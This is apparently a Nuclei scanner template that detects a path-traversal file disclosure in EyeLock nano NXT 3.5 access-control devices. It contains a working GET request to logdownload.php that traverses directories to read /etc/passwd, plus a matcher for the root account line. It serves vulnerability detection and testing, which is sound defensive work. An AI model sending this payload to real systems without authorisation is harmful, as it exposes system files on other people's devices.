nuclei-templates/http/vulnerabilities/other/eyelock-nano-lfd.yaml

29 lines
1.0 KiB
YAML

id: eyelock-nano-lfd
info:
name: EyeLock nano NXT 3.5 - Arbitrary File Retrieval
author: geeknik
severity: high
description: EyeLock nano NXT suffers from a file retrieval vulnerability when input passed through the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This can be exploited to disclose contents of files from local resources.
reference:
- https://www.zeroscience.mk/codes/eyelock_lfd.txt
metadata:
max-request: 1
tags: iot,lfi,eyelock
http:
- method: GET
path:
- "{{BaseURL}}/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body
# digest: 4a0a00473045022032e52a55ea074d1260dcdd3cd9cca43408e1a518dfec633df2d5865351fd27a40221009f4d1d65699d6288cd8a54a263927849b4e093b88e3d61bb69fb0da42495cbc6:922c64590222798bb761d5b6d8e72950